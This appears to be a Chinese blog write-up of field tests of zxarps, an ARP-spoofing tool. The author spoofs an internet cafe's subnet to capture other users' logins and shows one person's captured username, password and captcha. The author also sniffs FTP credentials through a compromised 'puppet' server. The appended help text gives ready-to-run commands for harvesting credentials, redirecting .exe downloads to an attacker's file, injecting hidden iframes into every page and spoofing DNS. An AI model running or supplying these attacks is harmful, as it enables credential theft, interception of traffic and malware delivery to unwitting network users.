zxarps 试用arp欺骗初探之一

zxarps 试用arp欺骗初探之一

                             zxarps,arp欺骗,dns欺骗,arp,dns,huaike

   zxarps.exe 程序大小10.8k,程序作者介绍该程序可以进行arp欺骗,甚至一些更具体而危险的功能.具体介绍看软件的帮助,得先安装winpcap才能看的到.zxarps先是在幻影旅团论坛看到(现在已经关闭了).

测试环境:zxarps,WinPcap_4_0_beta3,网吧:网关:192.168.0.2,本机ip:192.168.0.33.
网吧里arp -a的结果如下:

C:/Documents and Settings/admin>arp -a

Interface: 192.168.0.33 on Interface 0x1000003
Internet Address      Physical Address      Type
192.168.0.2           00-3c-01-50-4a-70     static
192.168.0.42          00-e0-4c-a2-2c-6e     dynamic
192.168.0.200         00-0c-76-e9-5c-4e     dynamic
192.168.0.222         00-0c-76-b6-86-b6     dynamic
192.168.0.251         00-17-9a-bd-7e-8b     dynamic

   执行zxarps命令:
C:/>zxarps -idx 0 -ip 192.168.0.3-192.168.0.253 -sethost 192.168.0.2 -port 80 -l
ogfilter pass,password -save_h aa.txt -spoofmode 3
/*该命令表示欺骗从192.168.0.3至192.168.0.253 ip段的所有ip地址与网关的关于80端口的数据包,数据包过滤字符pass,password,仅存贮包含pass和password的数据包到aa.txt中,并且是HEX模式.*/
很快的,数据包就跟瀑布一样,唰唰的......................不到30秒aa.txt文件就过M了,流量太大了.



   解析抓取的数据包,(为了保护,选了其中一小部分分析):
30 2D 2E 2E 2E 2E 68 75 69 79 75 61 6E 3D 64 7A    0-....huiyuan=dz

6C 68 6A 26 70 61 73 73 77 6F 72 64 3D 35 31 30    lhj&password=510

32 31 31 26 79 61 6E 7A 68 65 6E 67 3D 38 32 33    211&yanzheng=823

33 26 6C 6F 67 69 6E 2E 78 3D 30 26 6C 6F 67 69    3&login.x=0&logi

6E 2E 79 3D 30                                     n.y=0          

/*可以看的出用户名:dzlhj,密码:510211,验证码8233
抓到的包有很多都是垃圾包,没有实用价值,很多包里根本就没有pass或是password字符,但也被纪录下来了,很可能是数据流量太大,zxarps来不及处理........
ps:我执行的命令根据语法和理解,应该没错..........................
该软件确实很危害,至少比xsniff强多了,xsniff在这样的交换环境下根本就不起作用.

   关于该软件的后续测试还在进行中............

zxarps 试用arp欺骗初探之二
                                                          zxarps,arp欺骗,dns欺骗,arp,dns,huaike


   关于zxarps的使用测试。对于arp欺骗所需要的环境和这个的危害性我就不多说了，不知道的可以搜索一下。这个玩意真的很可怕。今天测试了它的交换环境下的arp欺骗，主要用来sniff现在流行的serv-u的数据包。（这个常常被黑客所利用）

   测试环境：axarps.exe，WinPcap_4_0_beta3 ，网络是标准机房的交换机环境，目标主机：59.36.xx.a，傀儡主机：59.36.xx.b 网关：59.36.xx.c

   傀儡主机：59.36.xx.b 上安装winpcap驱动
   本人在网吧远程连接傀儡主机（终端服务），傀儡上运行以下命令：
zxarps -idx 0 -ip 59.36.xx.a -port 21 -save_h a.log -spoofmode 3
/*该命令是采用同时欺骗网关和目标主机的模式，监听目标主机的21端口的所有通信，并把结果保存到a.log中*/
---------------------------------------------------------------------------------
C:/>zxarps -idx 0 -ip 59.36.xx.a -port 21 -save_h a.log -spoofmode 3

0. Intel(R) PRO/100 VE Network Connection
        IP Address. . . . . : 59.36.xx.b
        Physical Address. . : 00-16-76-11-93-45
        Default Gateway . . : 59.36.xx.c
[*] Bind on 59.36.xx.b Intel(R) PRO/100 VE Network Connection...
Scanning Alive Host......
Found Alive Host:
1:    59.36.xx.a 00-0E-A6-C8-19-E3
Sniffing......
第 9 个数据包写入到文件
------------------------------------------------------------------------------

    在傀儡主机上远程运行以上命令后，再在网吧电脑上测试来连接目标主机的ftp，以下是连接信息以及网吧电脑的ipconfig结果，我是用用户test密码aaaaaa连接测试的。
---------------------------------------------------------------
C:/Documents and Settings/admin>ftp 59.36.bb.a
Connected to 59.36.bb.a.
220 Serv-U FTP Server v6.0 for WinSock ready...
User (59.36.xx.a:(none)): test
331 User name okay, need password.
Password:
530 Not logged in.
Login failed.
ftp> bye
221 Goodbye!

C:/Documents and Settings/admin>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 192.168.0.11
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.2
----------------------------------------------------------------
   傀儡主机上有反应了，提示已经开始抓到包了，打开a.log察看，里面纪录的登陆目标主机ftp的所有过程：
----------------------------------------------------------------
#TCP 2007-02-07 21:30:5659.36.xx.a:21 -> 221.229.253.102:1601 32 32 30 20 53 65 72 76 2D 55 20 46 54 50 20 53    220 Serv-U FTP S 65 72 76 65 72 20 76 36 2E 30 20 66 6F 72 20 57    erver v6.0 for W 69 6E 53 6F 63 6B 20 72 65 61 64 79 2E 2E 2E 2E    inSock ready.... 2E                                                 .               #TCP 2007-02-07 21:31:02221.229.253.102:1601 -> 59.36.xx.a:21 55 53 45 52 20 74 65 73 74 2E 2E                   USER test..     #TCP 2007-02-07 21:31:02221.229.253.102:1601 -> 59.36.xx.a:21 55 53 45 52 20 74 65 73 74 2E 2E                   USER test..     #TCP 2007-02-07 21:31:0259.36.xx.a:21 -> 221.229.253.102:1601 33 33 31 20 55 73 65 72 20 6E 61 6D 65 20 6F 6B    331 User name ok 61 79 2C 20 6E 65 65 64 20 70 61 73 73 77 6F 72    ay, need passwor 64 2E 2E 2E                                        d...            #TCP 2007-02-07 21:31:03221.229.253.102:1601 -> 59.36.xx.a:21 50 41 53 53 20 61 61 61 61 61 2E 2E                PASS aaaaa..    #TCP 2007-02-07 21:31:03221.229.253.102:1601 -> 59.36.xx.a:21 50 41 53 53 20 61 61 61 61 61 2E 2E                PASS aaaaa..    #TCP 2007-02-07 21:31:05221.229.253.102:1601 -> 59.36.xx.a:21 51 55 49 54 2E 2E                                  QUIT..          #TCP 2007-02-07 21:31:05221.229.253.102:1601 -> 59.36.xx.a:21 51 55 49 54 2E 2E                                  QUIT..          #TCP 2007-02-07 21:31:0559.36.xx.a:21 -> 221.229.253.102:1601 32 32 31 20 47 6F 6F 64 62 79 65 21 2E 2E          221 Goodbye!..

-----------------------------------------------------------------
   整个过程都被sniff到了，真的得佩服zxarps的能力，但同时这么强大的工具绝对是危害！！！！是公害！！！！网络上的服务器可能又要挂了一大批了。（警告：非法闯入未被授权的计算机是违法的，破坏就更是违法的。谁破坏谁是猪，哈哈哈哈哈。）

说明：

zxarps
作者： lzx
来源：幻影

说明：需要winPcap 基于arp欺骗，
具体功能看下面的使用说明~~~懒得打太多字了~~~
基于ARP欺骗的东东，可网页插马，DNS欺骗，自定义关键字嗅探等

0. Realtek RTL8139

IP Address. . . . . : 192.168.1.101

Physical Address. . : 00-11-D8-6B-5E-19

Default Gateway . . : 192.168.1.1

1. WAN (PPP/SLIP) Interface

IP Address. . . . . : xx.xx.xx.xx

Physical Address. . : 00-52-00-00-00-00

Default Gateway . . : xx.xx.xx.xx

options:

-idx [index] 网卡索引号

-ip [ip] 欺骗的IP,用'-'指定范围,','隔开

-sethost [ip] 默认是网关,可以指定别的IP

-port [port] 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口

-reset 恢复目标机的ARP表

-hostname 探测主机时获取主机名信息

-logfilter [string]设置保存数据的条件，必须+-_做前缀,后跟关键字,

','隔开关键字,多个条件'|'隔开

所有带+前缀的关键字都出现的包则写入文件

带-前缀的关键字出现的包不写入文件

带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)

-save_a [filename] 将捕捉到的数据写入文件 ACSII模式

-save_h [filename] HEX模式

-hacksite [ip] 指定要插入代码的站点域名或IP,

多个可用','隔开,没指定则影响所有站点

-insert [html code]指定要插入html代码

-postfix [string] 关注的后缀名，只关注HTTP/1.1 302

-hackURL [url] 发现关注的后缀名后修改URL到新的URL

-filename [name] 新URL上有效的资源文件名

-hackdns [string] DNS欺骗，只修改UDP的报文,多个可用','隔开

格式: 域名|IP，www.aa.com|222.22.2.2,www.bb.com|1.1.1.1

-Interval [ms] 定时欺骗的时间间隔，默认是3秒

-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者

-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB

example:

嗅探指定的IP段中端口80的数据，并以HEX模式写入文件

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log

FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件

zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log

HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log

用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探

zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log

如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe

指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>"

指定的IP段中的用户访问的所有网站都插入一个框架代码

zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>"

指定的两个IP的总带宽限制到20KB

zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20

DNS欺骗

zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"

zxarps Build 01/17/2007 By LZX.